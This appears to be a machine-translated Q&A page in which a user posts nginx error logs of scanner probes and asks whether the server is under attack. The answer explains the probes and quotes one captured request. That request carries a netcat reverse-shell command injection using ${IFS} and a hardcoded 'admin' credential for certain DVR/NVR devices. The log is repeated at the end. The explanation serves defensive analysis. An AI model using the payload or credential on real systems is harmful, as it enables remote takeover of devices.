通过查看 nginx 错误日志,我的服务器是否受到攻击?
by looking at nginx error log, Is my server under attack?
这是 ubuntu 18.04 上的 nginx 错误日志的一部分。我的 nodejs 服务器有一个持续的 http 请求。我的问题是服务器是否受到攻击?网上查了一下,52.69.23.0/255.255.255.0离日本东京一个街区。
2019/10/02 02:50:03 [error] 869#0: *415 directory index of "/ebs/www/" is forbidden, client: 221.126.40.214, server: 52.69.23.227, request: "HEAD / HTTP/1.1", host: "hongkong.me", referrer: "http://hongkong.me"
2019/10/02 03:02:42 [error] 869#0: *416 directory index of "/ebs/www/" is forbidden, client: 71.6.232.4, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:52 [error] 869#0: *418 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:52 [error] 869#0: *419 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:52 [error] 869#0: *420 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:52 [error] 869#0: *421 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *422 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *423 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *424 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *425 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *426 directory index of "/ebs/www/" is forbidden, client: 106.13.99.19, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 06:06:25 [error] 869#0: *427 directory index of "/ebs/www/" is forbidden, client: 209.17.96.194, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 06:08:39 [error] 869#0: *429 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *430 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *431 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *432 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *433 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *434 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:41 [error] 869#0: *435 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:41 [error] 869#0: *436 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:41 [error] 869#0: *437 directory index of "/ebs/www/" is forbidden, client: 132.232.15.163, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
[ E 2019-10-02 06:17:55.8878 846/Tc age/Cor/SecurityUpdateChecker.h:362 ]: Security update check failed: File not readable: /home/ubuntu/.rvm/gems/ruby-2.3.3/gems/passenger-5.1.12/resources/update_check_client_cert.pem (next check in 24 hours)
2019/10/02 06:51:06 [error] 869#0: *438 directory index of "/ebs/www/" is forbidden, client: 167.114.227.178, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 09:56:10 [error] 869#0: *440 directory index of "/ebs/www/" is forbidden, client: 62.98.60.237, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 11:15:18 [error] 869#0: *442 directory index of "/ebs/www/" is forbidden, client: 182.149.116.159, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 11:41:21 [error] 869#0: *443 directory index of "/ebs/www/" is forbidden, client: 183.129.160.229, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 11:43:43 [error] 869#0: *444 directory index of "/ebs/www/" is forbidden, client: 150.107.206.166, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 13:16:08 [error] 869#0: *445 directory index of "/ebs/www/" is forbidden, client: 77.75.90.220, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 13:28:43 [error] 869#0: *446 directory index of "/ebs/www/" is forbidden, client: 219.92.248.187, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 15:38:08 [error] 869#0: *449 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:08 [error] 869#0: *450 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:08 [error] 869#0: *451 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:08 [error] 869#0: *452 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:08 [error] 869#0: *453 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:09 [error] 869#0: *454 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:09 [error] 869#0: *455 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:09 [error] 869#0: *456 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:11 [error] 869#0: *457 directory index of "/ebs/www/" is forbidden, client: 129.28.192.228, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 15:55:41 [error] 869#0: *458 directory index of "/ebs/www/" is forbidden, client: 189.126.64.134, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 16:27:39 [error] 869#0: *459 directory index of "/ebs/www/" is forbidden, client: 72.44.25.17, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 16:50:44 [error] 869#0: *460 open() "/ebs/www/editBlackAndWhiteList" failed (2: No such file or directory), client: 93.174.93.178, server: 52.69.23.227, request: "POST /editBlackAndWhiteList HTTP/1.1", host: "my_server_ip"
2019/10/02 17:32:48 [error] 869#0: *461 directory index of "/ebs/www/" is forbidden, client: 151.70.192.60, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 17:33:10 [error] 869#0: *462 directory index of "/ebs/www/" is forbidden, client: 151.70.192.60, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 17:33:11 [error] 869#0: *463 directory index of "/ebs/www/" is forbidden, client: 151.70.192.60, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 17:33:56 [error] 869#0: *464 directory index of "/ebs/www/" is forbidden, client: 151.70.192.60, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 17:48:33 [error] 869#0: *465 directory index of "/ebs/www/" is forbidden, client: 110.34.3.142, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 19:37:18 [error] 869#0: *467 directory index of "/ebs/www/" is forbidden, client: 80.132.43.129, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 19:54:15 [error] 869#0: *468 directory index of "/ebs/www/" is forbidden, client: 52.206.7.27, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 19:59:40 [error] 869#0: *469 directory index of "/ebs/www/" is forbidden, client: 128.14.134.170, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 20:30:02 [error] 869#0: *470 directory index of "/ebs/www/" is forbidden, client: 209.17.96.194, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 21:02:49 [error] 869#0: *472 open() "/ebs/www/editBlackAndWhiteList" failed (2: No such file or directory), client: 93.174.93.178, server: 52.69.23.227, request: "POST /editBlackAndWhiteList HTTP/1.1", host: "my_server_ip"
2019/10/02 21:08:55 [error] 869#0: *474 directory index of "/ebs/www/" is forbidden, client: 46.217.157.121, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 21:08:55 [error] 869#0: *475 directory index of "/ebs/www/" is forbidden, client: 46.217.157.121, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 21:11:19 [error] 869#0: *476 open() "/ebs/www/wp-login.php" failed (2: No such file or directory), client: 120.26.95.190, server: 52.69.23.227, request: "GET /wp-login.php HTTP/1.1", host: "ec2-54-64-226-99.ap-northeast-1.compute.amazonaws.com"
2019/10/02 21:30:34 [error] 869#0: *477 directory index of "/ebs/www/" is forbidden, client: 62.109.0.97, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 22:02:26 [error] 869#0: *478 directory index of "/ebs/www/" is forbidden, client: 88.132.136.65, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 23:51:33 [error] 869#0: *479 directory index of "/ebs/www/" is forbidden, client: 183.129.160.229, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 01:32:25 [error] 869#0: *480 directory index of "/ebs/www/" is forbidden, client: 200.161.234.246, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 01:56:03 [error] 869#0: *481 directory index of "/ebs/www/" is forbidden, client: 89.37.100.98, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 02:43:38 [error] 869#0: *483 directory index of "/ebs/www/" is forbidden, client: 47.34.25.82, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 03:03:44 [error] 869#0: *484 directory index of "/ebs/www/" is forbidden, client: 89.37.100.98, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 03:24:46 [error] 869#0: *485 directory index of "/ebs/www/" is forbidden, client: 89.37.100.98, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 03:31:23 [error] 869#0: *486 directory index of "/ebs/www/" is forbidden, client: 120.220.28.152, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 05:25:46 [error] 869#0: *493 directory index of "/ebs/www/" is forbidden, client: 162.62.17.159, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 05:25:46 [error] 869#0: *494 directory index of "/ebs/www/" is forbidden, client: 162.62.17.159, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 06:15:59 [error] 869#0: *497 directory index of "/ebs/www/" is forbidden, client: 93.157.241.194, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
[ E 2019-10-03 06:17:55.9323 846/Tc age/Cor/SecurityUpdateChecker.h:362 ]: Security update check failed: File not readable: /home/ubuntu/.rvm/gems/ruby-2.3.3/gems/passenger-5.1.12/resources/update_check_client_cert.pem (next check in 24 hours)
2019/10/03 06:26:39 [error] 869#0: *499 directory index of "/ebs/www/" is forbidden, client: 185.113.238.146, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 06:38:29 [error] 869#0: *500 directory index of "/ebs/www/" is forbidden, client: 187.85.133.141, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 07:12:41 [error] 869#0: *502 directory index of "/ebs/www/" is forbidden, client: 14.184.219.103, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 07:17:46 [error] 869#0: *503 directory index of "/ebs/www/" is forbidden, client: 103.230.241.39, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 07:26:52 [error] 869#0: *504 directory index of "/ebs/www/" is forbidden, client: 185.238.237.117, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 07:33:36 [error] 869#0: *505 directory index of "/ebs/www/" is forbidden, client: 80.82.70.118, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 07:53:00 [error] 869#0: *508 directory index of "/ebs/www/" is forbidden, client: 60.191.52.254, server: 52.69.23.227, request: "HEAD http://112.124.42.80:63435/ HTTP/1.1", host: "112.124.42.80:63435"
2019/10/03 08:06:29 [error] 869#0: *510 directory index of "/ebs/www/" is forbidden, client: 60.208.210.67, server: 52.69.23.227, request: "HEAD http://123.125.114.144/ HTTP/1.1", host: "123.125.114.144"
2019/10/03 08:06:44 [error] 869#0: *511 directory index of "/ebs/www/" is forbidden, client: 46.170.207.14, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 09:04:28 [error] 869#0: *512 directory index of "/ebs/www/" is forbidden, client: 181.168.206.29, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 09:44:08 [error] 869#0: *513 directory index of "/ebs/www/" is forbidden, client: 178.212.49.134, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 10:55:19 [error] 869#0: *514 directory index of "/ebs/www/" is forbidden, client: 222.142.157.79, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 12:32:56 [error] 869#0: *516 directory index of "/ebs/www/" is forbidden, client: 81.213.111.207, server: 52.69.23.227, request: "GET / HTTP/1.0", host: "my_server_ip"
2019/10/03 13:23:45 [error] 869#0: *518 open() "/ebs/www/editBlackAndWhiteList" failed (2: No such file or directory), client: 93.174.93.178, server: 52.69.23.227, request: "POST /editBlackAndWhiteList HTTP/1.1", host: "my_server_ip"
2019/10/03 13:37:13 [error] 869#0: *519 directory index of "/ebs/www/" is forbidden, client: 143.202.226.42, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 13:50:41 [error] 869#0: *520 directory index of "/ebs/www/" is forbidden, client: 84.228.31.42, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 14:07:19 [error] 869#0: *521 directory index of "/ebs/www/" is forbidden, client: 66.252.220.245, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 14:36:17 [error] 869#0: *522 directory index of "/ebs/www/" is forbidden, client: 118.45.169.144, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 14:47:49 [error] 869#0: *523 directory index of "/ebs/www/" is forbidden, client: 103.113.104.144, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 15:05:25 [error] 869#0: *525 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *526 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *527 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *528 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *529 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *530 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:26 [error] 869#0: *531 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:26 [error] 869#0: *532 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:28 [error] 869#0: *533 directory index of "/ebs/www/" is forbidden, client: 222.186.130.20, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 15:14:25 [error] 869#0: *534 directory index of "/ebs/www/" is forbidden, client: 35.205.71.151, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 16:11:51 [error] 869#0: *535 directory index of "/ebs/www/" is forbidden, client: 175.158.139.94, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 16:33:33 [error] 869#0: *537 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:34 [error] 869#0: *538 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:34 [error] 869#0: *539 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:34 [error] 869#0: *540 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:35 [error] 869#0: *541 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:35 [error] 869#0: *542 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:36 [error] 869#0: *543 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:36 [error] 869#0: *544 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:36 [error] 869#0: *545 directory index of "/ebs/www/" is forbidden, client: 132.145.207.123, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 16:46:53 [error] 869#0: *546 open() "/ebs/www/adminer.php" failed (2: No such file or directory), client: 46.253.39.142, server: 52.69.23.227, request: "GET /adminer.php HTTP/1.1", host: "my_server_ip", referrer: "http://my_server_ip/adminer.php"
2019/10/03 16:47:04 [error] 869#0: *547 open() "/ebs/www/adminer.php" failed (2: No such file or directory), client: 176.104.107.105, server: 52.69.23.227, request: "GET /adminer.php HTTP/1.1", host: "my_server_ip", referrer: "http://my_server_ip/adminer.php"
2019/10/03 17:11:10 [error] 869#0: *548 directory index of "/ebs/www/" is forbidden, client: 45.161.103.201, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 19:12:28 [error] 869#0: *549 directory index of "/ebs/www/" is forbidden, client: 181.115.249.173, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 19:54:54 [error] 869#0: *550 directory index of "/ebs/www/" is forbidden, client: 77.247.108.162, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 20:47:59 [error] 869#0: *552 directory index of "/ebs/www/" is forbidden, client: 138.59.187.50, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 20:48:31 [error] 869#0: *553 directory index of "/ebs/www/" is forbidden, client: 138.59.187.50, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 20:58:00 [error] 869#0: *554 directory index of "/ebs/www/" is forbidden, client: 89.248.169.12, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 22:34:49 [error] 869#0: *555 directory index of "/ebs/www/" is forbidden, client: 92.63.192.239, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 22:50:36 [error] 869#0: *556 directory index of "/ebs/www/" is forbidden, client: 59.5.187.231, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 22:52:45 [error] 869#0: *557 directory index of "/ebs/www/" is forbidden, client: 36.82.101.191, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
任何连接到 public 互联网的服务器都会在某种程度上受到攻击,即使它并不容易受到攻击。 Internet 范围内的漏洞扫描会找到适合您的方式。流量表示 PHP 扫描和最近在我的 IPS 上显示的其他一些有趣的流量:
主机 93.174.93[.]178
向目的地 URL "editBlackAndWhiteList" 发送 HTTP POST
请求,使用 Base64 编码凭据:
admin:{12213BD1-69C7-4862-843D-260500D1DA40}
XML 负载:
refuse allow ip iprange mac true refuse true ip $(nc${IFS}93.174.93.178${IFS}31337${IFS}-e${IFS}$SHELL&)
IFS 代表 "internal field separator"。 shell 使用它来确定如何进行分词。
IFS
的默认值由白色space 个字符(space、制表符和换行符)组成。 $IFS or ${IFS}
,常用于命令注入,代替白色space。对于许多命令行解释器,shells 的 Unix 操作系统,内部字段分隔符是一个变量,它定义用于将模式分隔为某些操作的标记的字符。
$(nc 93.174.93[.]178 31337 -e $SHELL&)
– Netcat 反向 Shell 到端口 31337
上的主机 93.174.93[.]178
。
Fortinet 对此流量有一个 IPS
签名,“HTTP.Unix.Shell.IFS.Remote.Code.Execution.”
它表示检测到使用内部字段分隔符的可疑 HTTP 请求。
https://fortiguard.com/encyclopedia/ips/45677/http-unix-shell-ifs-remote-code-execution
Snort IPS 在签名下标记此流量,“ET POLICY Incoming Basic Auth Base64 HTTP Password detected unencrypted.”
主机试图通过硬编码的 'admin' Web GUI 密码利用深圳市同天数码科技有限公司和 OEM {DVR/NVR/IPC} API 中的远程代码执行漏洞获得反向 shell。 GitHub 上有六个 POC:https://github.com/mcw0/PoC/blob/master/TVT_and_OEM_IPC_NVR_DVR_RCE_Backdoor_and_Information_Disclosure.txt
明智的做法是在您的网络服务器前设置一个 IPS。
这是 ubuntu 18.04 上的 nginx 错误日志的一部分。我的 nodejs 服务器有一个持续的 http 请求。我的问题是服务器是否受到攻击?网上查了一下,52.69.23.0/255.255.255.0离日本东京一个街区。
2019/10/02 02:50:03 [error] 869#0: *415 directory index of "/ebs/www/" is forbidden, client: 221.126.40.214, server: 52.69.23.227, request: "HEAD / HTTP/1.1", host: "hongkong.me", referrer: "http://hongkong.me"
2019/10/02 03:02:42 [error] 869#0: *416 directory index of "/ebs/www/" is forbidden, client: 71.6.232.4, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:52 [error] 869#0: *418 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:52 [error] 869#0: *419 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:52 [error] 869#0: *420 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:52 [error] 869#0: *421 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *422 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *423 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *424 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *425 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *426 directory index of "/ebs/www/" is forbidden, client: 106.13.99.19, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 06:06:25 [error] 869#0: *427 directory index of "/ebs/www/" is forbidden, client: 209.17.96.194, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 06:08:39 [error] 869#0: *429 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *430 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *431 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *432 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *433 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *434 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:41 [error] 869#0: *435 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:41 [error] 869#0: *436 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:41 [error] 869#0: *437 directory index of "/ebs/www/" is forbidden, client: 132.232.15.163, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
[ E 2019-10-02 06:17:55.8878 846/Tc age/Cor/SecurityUpdateChecker.h:362 ]: Security update check failed: File not readable: /home/ubuntu/.rvm/gems/ruby-2.3.3/gems/passenger-5.1.12/resources/update_check_client_cert.pem (next check in 24 hours)
